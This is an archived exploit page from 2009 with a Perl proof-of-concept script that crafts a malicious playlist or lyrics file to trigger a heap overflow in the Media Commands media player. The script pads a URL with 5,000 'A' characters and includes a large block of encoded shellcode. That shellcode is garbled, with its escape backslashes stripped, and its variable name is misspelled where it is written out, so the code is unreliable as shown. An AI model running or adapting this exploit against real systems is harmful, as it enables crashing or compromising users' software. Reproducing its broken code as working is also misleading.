[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Media Commands (M3U,M3l,TXT,LRC Files) Local Heap Overflow PoC
# Published : 2009-03-02
# Author : Hakxer
# Previous Title : Novell eDirectory iMonitor (Accept-Language) Request BOF PoC
# Next Title : Netgear WGR614v9 Wireless Router Get Request Denial of Service Vuln 


#!usr/bin/perl                                       #
# Discovered & Coded by : Hakxer                     #
# Media Commands (M3U,M3l,TXT,LRC Files) Crash PoC   #
# Greetz : Allah , ProViDoR , Egyptian x Hacker      #
# Team : Egy coders Team                             #
# Download/http://www.mediacommands.com/download.html#
# Description :                                      #
#              Import Hakxer.[Ext] Into program ...  #
#              Program Get Crashed ;)                #
######################################################

my $crash="http://"."A" x 5000;
my $CoDe=
"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49".
"x49x49x49x48x49x49x49x49x49x49x49x49x51x5ax6ax67".
"x58x30x41x31x50x41x42x6bx42x41x77x42x32x42x41x32".
"x41x41x30x41x41x58x50x38x42x42x75x79x79x6bx4cx70".
"x6ax78x6bx52x6dx4bx58x4bx49x39x6fx6bx4fx4bx4fx51".
"x70x4ex6bx72x4cx56x44x47x54x6cx4bx63x75x37x4cx4e".
"x6bx43x4cx66x65x70x78x35x51x78x6fx6ex6bx50x4fx65".
"x48x4ex6bx63x6fx65x70x34x41x68x6bx43x79x4ex6bx50".
"x34x6cx4bx54x41x38x6ex70x31x69x50x4cx59x4ex4cx4e".
"x64x39x50x33x44x54x47x6fx31x6bx7ax56x6dx54x41x6f".
"x32x38x6bx5ax54x55x6bx32x74x65x74x35x78x71x65x4d".
"x35x4ex6bx41x4fx65x74x64x41x58x6bx52x46x4ex6bx34".
"x4cx70x4bx6ex6bx61x4fx37x6cx63x31x6ax4bx63x33x64".
"x6cx6ex6bx6cx49x30x6cx36x44x47x6cx70x61x4fx33x70".
"x31x6bx6bx41x74x6ex6bx52x63x76x50x6cx4bx47x30x46".
"x6cx6cx4bx30x70x55x4cx6ex4dx4ex6bx51x50x77x78x73".
"x6ex42x48x4cx4ex62x6ex36x6ex6ax4cx30x50x6bx4fx48".
"x56x55x36x31x43x65x36x70x68x44x73x45x62x71x78x34".
"x37x44x33x50x32x43x6fx46x34x6bx4fx6ax70x42x48x58".
"x4bx6ax4dx69x6cx45x6bx66x30x69x6fx48x56x53x6fx4e".
"x69x58x65x31x76x4fx71x78x6dx46x68x57x72x56x35x51".
"x7ax43x32x6bx4fx38x50x61x78x6bx69x56x69x39x65x6c".
"x6dx50x57x4bx4fx7ax76x33x63x76x33x72x73x70x53x66".
"x33x61x53x70x53x71x53x53x63x4bx4fx5ax70x32x46x31".
"x78x37x61x41x4cx30x66x73x63x6bx39x4bx51x5ax35x45".
"x38x79x34x34x5ax30x70x4bx77x62x77x69x6fx6ax76x62".
"x4ax64x50x43x61x66x35x79x6fx5ax70x32x48x6cx64x4e".
"x4dx76x4ex6bx59x41x47x69x6fx4bx66x72x73x70x55x6b".
"x4fx6ex30x42x48x6bx55x73x79x4cx46x61x59x41x47x39".
"x6fx6bx66x36x30x50x54x43x64x56x35x4bx4fx4ex30x4c".
"x53x43x58x6bx57x73x49x79x56x42x59x72x77x4bx4fx4b".
"x66x76x35x79x6fx6ex30x73x56x72x4ax33x54x30x66x55".
"x38x73x53x42x4dx4fx79x58x65x53x5ax70x50x56x39x76".
"x49x7ax6cx4ex69x4bx57x30x6ax77x34x4dx59x58x62x66".
"x51x4fx30x68x73x4fx5ax4bx4ex70x42x46x4dx6bx4ex30".
"x42x34x6cx6ax33x4cx4dx63x4ax76x58x6cx6bx4cx6bx6c".
"x6bx30x68x73x42x49x6ex4fx43x46x76x69x6fx42x55x41".
"x54x39x6fx79x46x33x6bx56x37x31x42x43x61x42x71x41".
"x41x50x6ax76x61x52x71x52x71x32x75x71x41x69x6fx4a".
"x70x61x78x4cx6dx39x49x54x45x7ax6ex63x63x79x6fx4e".
"x36x70x6ax69x6fx4bx4fx37x47x6bx4fx6ex30x4ex6bx31".
"x47x6bx4cx6fx73x6ax64x41x74x4bx4fx6ax76x73x62x6b".
"x4fx68x50x43x58x4cx30x4fx7ax53x34x53x6fx43x63x79".
"xdaxcbxd9x74x24xf4x5ex29xc9xb1x51xbax0cx2exe1x3d".
"x31x56x17x83xeexfcx03x5ax3dx03xc8x9ex2bx28x7exb6".
"x55x51x7exb9xc6x25xedx61x23xb1xabx55xa0xb9x36xdd".
"xb7xaexb2x52xa0xbbx9ax4cxd1x50x6dx07xe5x2dx6fxf9".
"x37xf2xe9xa9xbcx32x7dxb6x7dx78x73xb9xbfx96x78x82".
"x6bx4dxa9x81x76x06xf6x4dx78xf2x6fx06x76x4fxfbx47".
"x9bx4ex10x74x8fxdbx6fx16xebxc7x0ex25xc2x2cxb4x22".
"x66xe3xbex74x65x88xb1x68xd8x05x71x98x7cx72xfcxd6".
"x8ex6ex50x19x58x08x02x83x0dxe6x96x23xb9x7bxe5xec".
"x11x83xd9x7ax51x96x26x41x35x96x01xeax3cx8dxc8x95".
"xd2x46x17xc0x46x55xe8x3axfex80x1fx4fx52x65xdfx79".
"xfexd9x4cxd6x52x9dx21x9bx07xdex16x7dxc0x31xcbxe7".
"x43xbbx12x72x0bx1fxcex0cx0bx08x10x3axf9xa7xbfx97".
"x01x17x57xb3x53xb6x41xecx54x11xc2x47x54x4ex8dx82".
"xe3xe9x07x1bx0bx23xc7xf7xa7x99x17x27xd4x4ax0fxbe".
"x1dxf3x98xbfx74x51xd8xefx1fx30x42x69x88xa7xe7xfc".
"xadx42xa8xa7x04x5fxc1xb0x3dx1bx5bxdcxf3x63xa8x8a".
"x0ax21x62x34xb0x8axefx45x4fxebxa4xfex1bx63xc9xfe".
"xefx62xd2x8bx4bx74xfax28x03xd8x52x9fxfaxb6x55x4e".
"xacx13x07x8fx9exf4x0axb6x1axcbx06xb7xf3xb9x57xb8".
"xcbxc2x78xcdx63xc1xfax15xefxc6x2bxc7x0fxe8xbcx17".
"x65x0dx62x84x85xd8x63xfa";

# open(MYFILE,'>>hakxer.m3u');
# open(MYFILE,'>>hakxer.txt');
# open(MYFILE,'>>hakxer.m3l');
open(MYFILE,'>>hakxer.lrc');
print MYFILE $c0de;
print MYFILE $crash;
close(MYFILE);

# www.Syue.com [2009-03-02]